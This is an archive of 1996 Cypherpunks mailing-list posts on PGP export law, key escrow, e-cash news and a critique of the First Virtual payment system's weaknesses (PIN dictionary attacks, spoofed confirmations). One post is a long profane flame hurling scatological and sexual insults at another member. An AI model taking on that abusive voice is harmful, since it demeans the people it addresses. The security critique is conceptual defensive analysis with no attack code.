[uses PGP to communicate to Ray]
 
> Two questions:
> 
> 1. Does anyone think that legislation might be passed which would
> criminalize my communications with Ray?

It might.  Some people in law enforcement/government would
really like to see that, Constitution be damned.

> 2. Suppose someone writes a program Z that has no expicit crypto code in
> it, but has hooks for installing one or another version of PGP. Given a
> copy of Z, someone in this country could install PGP he got from MIT,
> whereas someone in Europe could install the international version.
> Would export of Z violate ITAR restrictions?

As currently interpreted by NSA/DOJ et al, yes.
"Pluggable crypto" is not allowed by the people who enforce ITAR.
They might be working towards the eventual police state but
they're not stupid.

NCSA, when they were about to release a new version of Mosaic that
had hooks for PGP, were explicitly told by NSA that they would
remove those hooks before the software was released.


BTW, no version of PGP is exportable under ITAR; they all
use real crypto.   The international version exists because of
patent problems with RSA and the way that those problems were
resolved.  I think this is explained in the README that comes
with PGP; if not, the book _The Official PGP Users Guide_
by Phil Zimmerman (ISBN 0-262-74017-6) explains it.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsmith@prairienet.org (David e. Smith)
Date: Thu, 10 Oct 1996 08:40:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ------>FREE DEMO<---------
Message-ID: <199610101538.LAA01989@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Greetings!
>
>This email is intended for persons that are interested in
>electronic marketing and online business. Your email addresses was 
>selected because you were listed in the net abuse newsgroup as
>someone who probably had their message deleted.  If you are interested
>in learning how you can market online in a way that the cyber-cops
>can't stop you, read on. If you don't fall into this category please 
>excuse the intrusion and ignore this message.  
>
>Within my targeted group electronic marketers and online businesses, I am 
>especially looking for individuals that are interested in marketing using 
>email.  If you are in that group, you may be interested in a software
>package I distribute called Email Works.  If you'd like more information and
>a FREE DEMO simply call our offices at: 609-933-0644 or 212-953-5234
>
>Don't reply to the email address from which this came for more information. 
>
>If you want to be placed on my remove list, reply to the address you
>received this email from with the word remove in the subject line.
>
>
>Thank you,
>Lisa
>
>
>
>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMl0YcyoZzwIn1bdtAQHniwGA2CJwO+2gzcDChrWWVgXPChpQEVoAfhpd
l8Apav87Pv6aH6Hm8ZE+Vv46hifO+Giw
=e8Sy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 10 Oct 1996 07:04:17 -0700 (PDT)
To: E.J.Koops@kub.nl
Subject: Re: Binding cryptography - a fraud-detectible alternative to key-esc
In-Reply-To: <736E4C76D98@frw3.kub.nl>
Message-ID: <199610101042.LAA00318@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Hey Bert-Jaap, I had you down as one of the good guys, what caused you
to fold :-)

Bert-Jaap Koops <E.J.Koops@kub.nl> writes on cpunks:
> We present an alternative that can give law-enforcement agencies
> access to session keys, without users having to deposit private
> keys.  Unilateral fraud in this scheme is easily detectible.

OK, so I can see how the `binding data' technique acheives a more
robust form of keys escrow of session keys, without handing over
private keys.  (Your wording also implied to me that the problem would
not exist if private keys were handed over, but I think this is not
the case, if a warrant is required to get the private keys, the stated
presumtion is that no speculative decryptions will be tried).  Also
the proposal (and other proposals which escrow session keys) doesn't
really provide any guarantees of protection from LE abuse, as such,
because they can decrypt all of the escrowed session keys with their
own private key.  But then the original clipper proposal had similar
supposed safeguards, they claimed to have the decryption keys split
across two databases, and they claimed that they would place the key
in a tamper resistant device so that it could only be used for the
duration of the court approved wiretap.

`binding data' combats the problem of people sabotaging key escrow by
using garbage for the escrowed session key.  Matt Blaze was able to
produce compliant capstone/tessera messages which would be accepted by
the recipient, and yet would reveal nothing to the LE agent.  Your
binding data technique would allow a software only implementation of
the non-interoperability requirements of clipper III, and combat
attacks such as Matt's.

However, simpler approaches I think fulfill the requirements given the
(stated) voluntary nature of GAK.

For instance, if you are using a hybrid RSA/symmetric key system with
the session key encrypted with RSA, you can encrypt the session key to
a second recipient also (PGP allows this much, Carl Ellison suggested
this for PGP, Bill Stewart recently also suggested the same).  If the
recipient wishes to check that the sender is really escrowing the same
session key, this can be acheived by revealing to the primary
recipient the random padding of the second recipient's RSA encrypted
copy of the session key.  The primary recipient can then repeat the
encryption, and check.  (I proposed this on sci.crypt last year some
time, with an anti-GAK caveat :-).

As GAK is (stated to be) voluntary, surely the only person who has any
business knowing whether the message is honestly GAKked is the
recipient.  After all you can double encrypt or not use GAK at your
option, so this seems to lose nothing for the GAKkers.

The description of the paper also says nothing about trust worthiness
of the TTPs, from the public's perspective.  It would be nice to see a
proposal which also resulted in the cryptographic revealing of number
of wire taps, as an unavoidable result of the protocol.  (Not that I,
or anyone else would want to use GAK still, but it would be a gesture
of good will on the part of the GAKkers, and would show intentions not
to misuse the system.  I suggest that they would never agree to such a
system because their stated aims are untrue: they *do* want to outlaw
non-escrowed encryption for domestic US traffic, and they *do* want to
decrypt without warrants, and without public audit.  Export control
and temporarily `voluntary' GAK is a means, not an end.)

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 10 Oct 1996 11:39:43 -0700 (PDT)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
Message-ID: <199610101839.LAA14097@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 AM 10/9/96 -0800, Timothy C. May wrote:
>Something ISPs could do--and may do if there is sufficient customer
>pressure--is to adopt a policy of "forward secrecy" (to slightly abuse this
>technical term). That is, to have an explicit policy--implemented in the
>software--of _really_ deleting the back messages once a customer downloads
>them to his site. This means that _backups_ must be done in a careful
>manner, such that even the backup tapes or disks are affected by a removal.

One technical approach is described in:

"A Revocable Backup System", dabo@cs.princeton.edu (Dan Boneh) and
rjl@cs.princeton.edu (Richard J. Lipton) in The 6th USENIX Security
Symposium Proceedings.

Basically the idea is to encrypt the file on the backup (tape) and then
lose the encryption key when you want to "forget" the file.


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 10 Oct 1996 09:15:52 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Tim May is a fine person.
In-Reply-To: <TqXJVD2w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961010115824.13340B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Ha ha ha! Timmy May really lost it. Now he spams this mailing list with
> "anonymous" rants, praising himself in third person. He is pathetic.

Prove that he's doing it.  You're pathetic.
 
> I'd almost feel sorry for Timmy May if he weren't such an ignorant, arrogant,
> obnoxious, loud-mouthed jerk.

Actually, unlike you, I do feel sorry for you, for you truly have no life
and have nothing better to do than to start flame wars and such.  Do
yourself a favor, get a real life.  Go get off your fat ass and do
something with yourself other than masturbating.  All you seem to be able
to do is to hide under your doctorate and badger this list with your 
crap.  Maybe take a yoga class so you can do what you claim Tim is able 
to, and maybe you'll get a blow job that way...

And how pathetic are your daily warnings about Tim anyway?  Looks like 
your pots are blacker than your kettle, oh lord slackbladder!

As for Tim, this list wouldn't even exist had he not gotten involved with 
it in its conception.  How would you know the difference anyway, you 
weren't here back then, or were you?  Perhaps under the name of Detweiler?

> Timmy May doesn't know shit about cryptography. He wouldn't know a public key
> cryptosystem from a man-in-the-middle attack if one of them bit him on his ass.

You wouldn't know what a life is if one came up to you and bit you on your
ass. Oh tell us oh great one, and what is it that you know?  But spare us 
the flames and hate.  We already know that you are an asshole, of that 
there is little doubt.  What is at doubt is your degree, or is it a 
pedigree?  Shower us with your knowledge if you have any, for it is 
apparent that dazzling us with your bullshit isn't working.
 
> Timmy has no life. That's why he floods this mailing list with his stupid
> off-topic rants.

And what by your definition is your level of life if all your output 
seems to be nothing more than flames and flame bait?  How much of a loser 
are you to resort to anonymous daily warnings about Tim?  Just how off 
topic and stupid was your message when you posted it?  Just how many 
plates of pork and beans do you eat each day to keep up your innane level 
of flatulence?

Apparently that "Doctorhood" of yours is good only for masturbatory self
congratulations, and when nobody pays attention to it, you turn around and
put others down so that in your oppinion, such as it is, you come out
smelling like roses.  Buddy, I've news for you, you aren't fooling anyone. 
You are the total absolute embodyment of shit.  No, before you
congratulate yourself on your achievement of shithood, you aren't even
even human or dog shit, no.  You are the essence of amoeba shit.  The
lowest of the low. You've a long way to go before you will ever achive 
the status of high human shit.  But I must admit, you certainly know how 
to strive for that goal.  It's too bad you'll never be more than low 
grade microscopic shit though.

And for that, you have my deepest condolances.  At least I hope this 
comforts you in your lack of life, for assuredly you haven't much of one.
At least at a minimum, if you get nothing else from this message, you'll 
get a tenth of an ounce of pitty.

But keep trying, I know it's hard, maybe if you try hard enough, you'll 
achive insect shit, perhaps even horsefly shitdom.  I believe in you 
Vulis, I know you can do it, come on, aspire to achive fly shitdom. :)

And maybe someday, if you are really really good you might even achive 
rat shitdom.  Then we'll be real proud of you for being rat shit, but 
until that time, strive hard and work long hours.  Hey, and when you reach 
rat shitdom and become emeritus ratus shitus, we'll throw you a party!  


=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 11:48:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <mNcLVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


News Release (Netscape): Monday, October 7, 1996

Netscape to Use CyberCash Technology

Netscape Communications Corporation (NASDAQ: NSCP) and CyberCash, Inc. (NASDAQ:
CYCH) today announced a technology and marketing relationship to broaden
payment options for Internet consumers. As part of the agreement, CyberCash has
licensed its CyberCoin Internet payment technology to Netscape. Netscape will
bundle its technology into future versions of Netscape products, including
Netscape LivePayment server software for online payment processing.

The two companies will also collaborate on including future CyberCash payment
services, such as CyberCash's electronic check services, into future Netscape
commerce offerings. Netscape and CyberCash plan to jointly market these
Internet payment solutions to consumers and businesses, and will work together
on efforts to accelerate the deployment of Secure Electronic Transactions (SET)
credit card payment protocol in the marketplace.

"We have had customer demand for small value payment technology particularly
from the professional information publishing industry -- the integration of
CyberCash's CyberCoin with Netscape's commerce solutions provides our customers
with a way to complete small transactions over the Internet," said Srivats
Sampath, vice president of marketing for server, tools and applications at
Netscape. "By offering a range of payment options for businesses and consumers,
Netscape and CyberCash will help expand the range of goods and services
available in the electronic marketplace."

"Combined with Netscape's customer base, CyberCoin is filling a need in the
marketplace for small payment processing," said Denis Yaro, executive vice
president, products and operations at CyberCash. "This is a huge step in our
efforts to bring Internet transaction technology to consumers and businesses
and to increase online inventory, making the virtual mall a reality."

"We are pleased to see this agreement between Netscape and CyberCash," said
Chuck White, senior vice president of First Data Card Services Group's
Electronic Funds Services unit. "The relationship between Netscape and
CyberCash will make it easier to deliver integrated payment solutions to our
client financial institutions, and their merchant customers that are using
Netscape LivePayment."

CyberCoin is a payment service which permits online purchases for items costing
between 25 cents and $10.00. This new payment solution opens up significant
opportunities for merchants to market low cost, high value items such as news
and information, graphics, games and music. It also allows merchants to
unbundle larger product offerings, and sell them in smaller increments.
Financial institutions to offer the CyberCoin service include First Union Bank,
First USA Paymentech, Michigan National Bank and First Data Corp.

Bundling CyberCash's CyberCoin technology into future releases of Netscape's
LivePayment point-of-sale software will enable online businesses to accept
multiple payment methods and implement new pricing and business models.
Netscape LivePayment will integrate this new payment functionality seamlessly
and cost-effectively, providing business people with administration and
configuration controls with flexible logging reports, and a variety of sample
merchant applications to minimize the start-up development costs of merchants.
Both Netscape and CyberCash will market Netscape LivePayment software to
businesses looking to develop or expand online distribution channels.

Netscape plans to integrate CyberCoin into future versions of Netscape
Navigator client software, which includes technology that streamlines
consumers' shopping experience by providing a uniform interface for Internet
purchases and transactions. Similar to a real wallet, this technology will
organize into one place a user's credit card numbers, shipping addresses,
digital IDs, electronic receipts and other payment instruments needed to
purchase goods and services on the Internet.

Netscape and CyberCash will coordinate their efforts on SET to assure
interoperability between their credit card-related electronic commerce
implementations. Netscape was one of the principal architects of the SET
specifications proposed by Visa International and MasterCard International.
Committed to being among the first to deliver SET-compliant products to the
marketplace, both Netscape and CyberCash will also collaborate with other
important industry leaders in an effort to facilitate SET's arrival in the
shortest possible timeframe. About Netscape Netscape Communications Corporation

(NASDAQ: NSCP) is a leading provider of open software for linking people and
information over enterprise networks and the Internet. The company offers a
full line of clients, servers, development tools and commercial applications to
create a complete platform for next-generation, live online applications.
Netscape Communications Corporation is based in Mountain View, California.

About CyberCash

CyberCash, Inc., (NASDAQ: CYCH), of Reston, Virginia, founded in August 1994,
is a leading developer of software and service solutions for secure financial
transactions over the Internet. The CyberCash system is designed to allow banks
to offer secure Internet payments to their customers. CyberCash works with
virtually all financial processing institutions, and is currently working with
VISA and MasterCard to develop and implement the Secure Electronic Transaction
(SET) protocol for online credit card transactions. The company's initial
service, which handles payments using major credit cards, was introduced in
April 1995.

CyberCoin, the company's innovative micropayment service that enables cash
transactions, was launched on Sept. 30, 1996. CyberCash's electronic check
service is expected to be released in Q4, 1996.



Edge: Tuesday, October 8, 1996

VeriFone Introduces Personal ATM and VeriSmart

VeriFone, Inc., Monday announced plans to bring the convenience of a bank
automatic teller machine into the homes of millions of consumers around the
world, enabling them to replace cash and access dozens of personal services
anytime, anywhere, using telephones, televisions, personal computers and other
low-cost devices and information appliances.Announced Monday at the ABA Bank
Card Conference, VeriFone unveiled plans to introduce a low-cost, palm-sized,
smart card reader/writer called the Personal ATM (P-ATM). The P-ATM will
connect to any standard telephone line, allowing consumers to interact with
their bank account to download cash,' securely and conveniently in the privacy
of the home or office.

In addition, leveraging VeriFone's leadership in Internet commerce, the P-ATM
will also interface with the VeriFone vWallet, and any stored-value card
scheme, enabling consumers to make purchases over the Internet, download funds
from their bank onto their smart card, transfer funds between accounts, and
perform on-line transactions between consumers and merchants. VeriFone also
revealed the development of the VeriSmart System architecture, which is
expected to accelerate consumer adoption of smart card applications. The
VeriSmart System will integrate a low-cost personal ATM device, a powerful set
of software applications that lets consumers securely interact with any
provider offering smart card services, and a comprehensive package of support
services.

Applications might include the ability to download electronic cash from their
bank, instantly receive rewards from loyalty programs, or provide selected
healthcare information to their doctor or pharmacist.

Six leading technology companies -- CIDCO, Gemplus, Key Tronic, Mondex
International, Scientific Atlanta and WebTV Networks, Inc. -- have announced
their support for VeriSmart and plan to work with VeriFone to develop further
technologies around the system.

"We are taking an aggressive role in developing the infrastructure for smart
card applications with our plans to introduce the Personal ATM and the
VeriSmart System," said Hatim Tyabji, chairman, president and CEO of VeriFone.

"VeriSmart will be the first technology that is card-scheme and hardware-device
independent, uniting all the elements in a truly end-to-end solution. We plan
to actively layer VeriSmart technology into our merchant point-of-sale
terminals and Omnihost client-server systems, to create solutions that bridge
all VeriFone markets worldwide. This action unveils the third element in our
three pronged strategy -- traditional debit/credit business, Internet commerce
and now consumer smart card technologies -- expanding VeriFone's leadership in
secure payments technologies worldwide."

In addition, American Express, GTE, Hewlett-Packard Company, MasterCard, NIPSCO
Industries, Inc., Sparbanken Bank (BABS), Sears Payment Systems (SPS), and
Wells Fargo have all announced support of the VeriSmart System.

The VeriSmart System is being designed to electronically link consumers to
their banks, telephone and utility companies, retail merchants and other
personal services. Using any one of a variety of smart card-ready devices, such
as the Personal ATM, telephone, PC, or set-top-box, a consumer will access
numerous personal services and interact with multiple stored-value card
schemes, loyalty programs, identification, and health care information.

The VeriSmart System will provide end-to-end security for all communications
between the access device and the smart card applications on the VeriSmart
server, ensuring data integrity of financial transactions and other
confidential information.

"This is the beginning of a new era for smart card applications," said Tom
Kilcoyne, general manager of VeriFone's Consumer Systems Division.

"The industry has been waiting for a compelling, cost-effective solution that
enables financial institutions, and a broad range of consumer service
providers, to move aggressively to build smart card applications. Endorsement
in the consumer market from these respected companies, combined with VeriFone's
global leadership position and expertise in the secure payment transaction
market, supports our belief in VeriSmart as a powerful system that can
accelerate development of the market for smart cards worldwide."

Wide Industry Support VeriFone's Consumer Systems Division's effort to enhance
the market for smart cards is drawing the support of consumer market leaders
that will contribute in pivotal areas of the system.

CIDCO Inc., the world's leading producer of subscriber terminal equipment that
supports intelligent network services being offered by telephone operating
companies, has formed an alliance with VeriFone to incorporate VeriSmart
technology into its products and to work with VeriFone on future projects.

"CIDCO is excited to be collaborating with VeriFone in the explosive consumer
smart card market," said Paul Locklin, CIDCO president and CEO. "The VeriSmart
system brings a strong added value to the products we market to our regional
Bell operating company customers." "VeriFone and Gemplus have had a close and
long-standing relationship over the years and we are proud to be part of this
latest breakthrough solution," said Marc Lassus, Gemplus CEO. "As a market
leader, our strategy has been to partner with companies that enable us to offer
the best-of-breed solutions, and our participation in VeriSmart extends this
strategy to the consumer market for smart cards."

"As consumers become more accepting of smart cards, initiatives like VeriSmart
will make it easier for banks and other institutions to introduce new products
and services that provide greater choice and convenience," said Ruann F. Ernst,
general manager of HP's Financial Services Business Unit.


Associated Press: Tuesday, October 8, 1996

Bankers Hope to Control 'Electronic Cash'

By E. SCOTT RECKARD

The largest organization of U.S. banks wants "smart cards" and "electronic
cash" limited to the banking industry.

The American Bankers Association, in its first official position on how
electronic cash should evolve, says such "stored-value" cards should be issued
only by regulated institutions with direct access to Federal Reserve payment
services -- namely banks, thrifts and credit unions.

The bankers' recommendation comes as several software companies are also
jockeying to provide payment systems over the Internet.

At a convention here, the bankers trade group warned that users of prepaid
phone cards have been ripped off by fly-by-night issuers. The same could happen
in storing funds for general use on plastic cards like credit cards or in
computers, the bankers said in issuing their report Sunday.

"If a nonbank issuer of stored value fails, consumers could be left holding the
bag - an empty bag," said James M. Culbertson, president for the past year of
the ABA and chairman of First National Bank in Asheboro, N.C.

The bankers' group acknowledged that some day computer companies may get into
the business of electronic cash. But if that happens, banks want the computer
companies to be subject to the same regulatory scrutiny that applies to banks
and thrifts.

While seeking exclusive rights to smart cards and their ilk, banks have
resisted the idea that conventional bank regulations should apply to electronic
cash. They oppose a proposal to apply the Federal Reserve's "Regulation E" to
stored-value cards. That regulation requires banks to offer written
confirmations of ATM transactions. Bankers say such a requirement would make
stored-value cards too expensive to issue.

And in pilot projects, banks have not treated the smart cards as deposits that
are insured by the Federal Deposit Insurance Corp. That means the consumer does
not earn interest on the unused cash backing up the card and the banks do not
have to set aside reserves as they would for a conventional deposit.

A smart card has a computer chip that stores information, including how much
the consumer has deposited. As a purchase is made, the amount is automatically
deducted from the balance in the card's memory.

In the future, consumers will be able to transfer cash to smart cards from
their home computers or at an automatic teller machine at a bank. Electronic
money is also being tested to pay for purchases over the Internet.

The move away from paper-based transactions has been a boon in many ways for
banks. The replacement of manual check-processing by electronically stored
images of the checks has probably paid off more for banks than any other
high-tech innovation, bank technology consultant Charles O. Hinely said in an
interview.

But banks could be pushed out of the payment system altogether if they don't
quickly get into computerized services and transactions, said Don Tapscott,
author of "The Digital Economy."

"If you don't, you're basically toast, and punishment is swift," he told the
bankers.

The trade group's new president, Walter A. Dods Jr., said he would work to
improve the image of bankers, whom he described as unfairly maligned despite
the financial support and considerable charity work they provide their
communities.

"But what do we get in return? We get legislation to limit ATM fees. We get a
reader telling Business Week recently that 'banks are just sucking us dry,"'
said Dods, the chairman of First Hawaiian Bank.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 10 Oct 1996 12:30:29 -0700 (PDT)
To: <cypherpunks@toad.com
Subject: Re: Why not PGP?
Message-ID: <199610101930.MAA18867@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 AM 10/10/96 -0600, Rollo Silver wrote:
>I use PGP to communicate (presumably) strong-cryptoed messages to my
>stepson Ray Hirschfeld in Amsterdam, and vice versa. He uses an
>internationational version of PGP, and I use the domestic version that I
>got from MIT. They seem to be compatible.

They are.


>I don't intend to submit my present or future private PGP keys for key
>escrow (Is that what's called GAK?). 

GAK stands for Goverment Access to Keys.  Key escrow is a term used in
government circles to avoid that truth.


>1. Does anyone think that legislation might be passed which would
>criminalize my communications with Ray?

Such communication was illegal during world war 2.  Your belief in furture
government (in)action depends on your trust of the government.


>2. Suppose someone writes a program Z that has no expicit crypto code in
>it, but has hooks for installing one or another version of PGP. Given a
>copy of Z, someone in this country could install PGP he got from MIT,
>whereas someone in Europe could install the international version.
>Would export of Z violate ITAR restrictions?

Yes


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@veriweb.com>
Date: Thu, 10 Oct 1996 12:37:26 -0700 (PDT)
To: Kip DeGraaf <kip@monroe.lib.mi.us>
Subject: Re: What are the flaws with FV payment system?
In-Reply-To: <Pine.SUN.3.91.961010103809.463D-100000@monroe.lib.mi.us>
Message-ID: <Pine.BSI.3.93.961010114549.7919B-100000@descartes.veriweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 10 Oct 1996, Kip DeGraaf wrote:

> I only received this an hour ago.  I would very much like to attend, but 
> can't put my fingers on the detailed analysis of FV's flaws in their 
> system, which I would like to bring up in person at this seminar.  
> 
> Could someone please point me in the right direction?
> 

I haven't seen any such analysis myself, but there is likely one available.
- From looking at FV's claims and descriptions of transactions, here's
a few things I'd say:

 o A buyer's VirtualPIN is given insecurely to the merchant, unless
   transmitted via secure HTTP. If not over SSL or HTTPS, anyone along
   the way can swipe the VirtualPIN.

 o It is easy to "verify" a PIN as a valid PIN. You can use finger, telnet,
   and email among other things. Easy target for a dictionary attack.

 o Payment confirmation messages are sent to the buyer via email, 
   unencrypted, insecure, etc... Easy target for slightly-less-than-honest
   system admins, and most anyone else between FV and the buyer. Easy 
   traffic analysis, though the FV payment scheme does not offer 
   anonymity as a feature. Absolutely zero privacy.

 o Read this: http://www.fv.com/pubdocs/FAQ-security.txt
   Nuff said.

 o It appears that anyone can fake a reply to a payment confirmation
   message. It appears some sort of transaction id is necessary in the reply,
   but it's not entirely evident. (the id comes in the comfirmation
   request if it does exist, you wouldn't need any other knowledge).

 o Given the above, it doesn't seem hard to spoof either merchant requests
   and/or buyer confirmations, charging the real VirtualPIN-holder without
   his/her knowledge. If the confirmation-request email could be prevented
   from reaching the intended user, they would never even know it happened,
   til they get their credit-card bill.

 o Logistically, it requires a user has access to his/her email account
   at all times to make purchases. For a timely purchase, it requires a
   user to receive the confirmation-request quickly, and the reply to
   reach FV quickly. Every ISP I've used has noticeable lag handling mail
   at times, often minutes long. Mail queues get big.

 o On the plus side, you send your credit card info over the incredibly,
   massively, montrously secure phone lines by calling these people up. ;-)

This is all from looking over their pages for a few minutes a while back,
and quicky just now, so I may have erred in places. Someone with experience
using the system and/or someone with FV's email message specs would be good
to talk to.

The claims they make about encryption just generally make me want to dislike
them immensely, regardless of the merits of their system.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jeremey Barrett
Senior Software Engineer                         jeremey@veriweb.com
VeriWeb Internet Corp.                           http://www.veriweb.com/

PGP Key fingerprint =  3B 42 1E D4 4B 17 0D 80  DC 59 6F 59 04 C3 83 64
PGP Public Key: http://www.veriweb.com/people/jeremey/pgpkey.html
                
		"less is more."  -- Mies van de Rohe.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMl1QoC/fy+vkqMxNAQE2VgQA2A75PJWRhh8n5rdOYhRS2vnuod2O9lzn
K8Rdxui9NZ6ZXk3RBCQHXG1vbzmKgwA9sb7BBjygrE4KdzdQUrHwhmJKZJfP7IGe
jbgNuAtXEYeIgP5K4pjjWWl0fVN4H7vV98AukkBxDDaif1Iklw/g4ByzKVa23i5k
9MCXNdercOU=
=Fws8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.net
Date: Thu, 10 Oct 1996 13:01:59 -0700 (PDT)
To: raph@cs.berkeley.edu (Raph Levien)
Subject: Re: pgp, edi, s/mime
In-Reply-To: <325D296E.796D3740@cs.berkeley.edu>
Message-ID: <199610102001.NAA01605@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> S/MIME also requires the use of RC2, which is not patented, although RSA
> may assert rights under trade secret law. This is still a bit
> controversial, and the issue of inclusion of RC2 in RIPEM has not been
> fully resolved yet. However, RSA has indicated a willingness to allow at
> least object code for RC2 to be released as part of the RIPEM
> distribution. The RC2 algorithm is only for compatibility with crippled
> "export" implemenations of S/MIME, and can be omitted if you're only
> ocmmunicating with non-crippled clients. (It should be noted that such a
> version would not be in compliance with the S/MIME implementation
> guide).

	An RC2-compatible cipher ships with SSLeay these days. Not a
problem.

-- 
Sameer Parekh					Voice:   510-986-8770
C2Net						FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 10 Oct 1996 12:58:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <199610101839.LAA14097@netcom8.netcom.com>
Message-ID: <v03007800ae831534b603@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:42 AM -0700 10/10/96, Bill Frantz wrote:
>At 10:13 AM 10/9/96 -0800, Timothy C. May wrote:
>>Something ISPs could do--and may do if there is sufficient customer
>>pressure--is to adopt a policy of "forward secrecy" (to slightly abuse this
>>technical term). That is, to have an explicit policy--implemented in the
>>software--of _really_ deleting the back messages once a customer downloads
>>them to his site. This means that _backups_ must be done in a careful
>>manner, such that even the backup tapes or disks are affected by a removal.
>
>One technical approach is described in:
>
>"A Revocable Backup System", dabo@cs.princeton.edu (Dan Boneh) and
>rjl@cs.princeton.edu (Richard J. Lipton) in The 6th USENIX Security
>Symposium Proceedings.
>
>Basically the idea is to encrypt the file on the backup (tape) and then
>lose the encryption key when you want to "forget" the file.

Given that keys = data, this just transfers the problem from one set of
data to another set of data. (Wanna bet a lot of ISPs would keep backups of
the disk with the keys on it?)

Granted, there's a compression factor, but the basic issue is not changed.
If the ISP is trusted to not make backups of user files, and overwrites the
disk, this is about as good as the vendor encrypting the files and then
agreeing to "lose" the key.

(Though let's hope he neither loses it, nor "looses" it (the common
misspelling), by throwing it in his Dumpster trashcan, a la the infamous
Mykotronx "losing" (and hence "loosing") of Clipper secrets.)

--Tim

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 10 Oct 1996 13:42:41 -0700 (PDT)
To: <cypherpunks@toad.com
Subject: Re: Why not PGP?
Message-ID: <199610102042.NAA10973@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 AM 10/10/96 -0600, Rollo Silver wrote:

>I don't intend to submit my present or future private PGP keys for key
>escrow (Is that what's called GAK?). To protect myself against forgetting
>my private key (which has happened once already) I'll no doubt some day put
>it on a floppy and put the floppy in my bank safe deposit box.

You can't "forget your key"; it's encrypted with your password and is on disk.

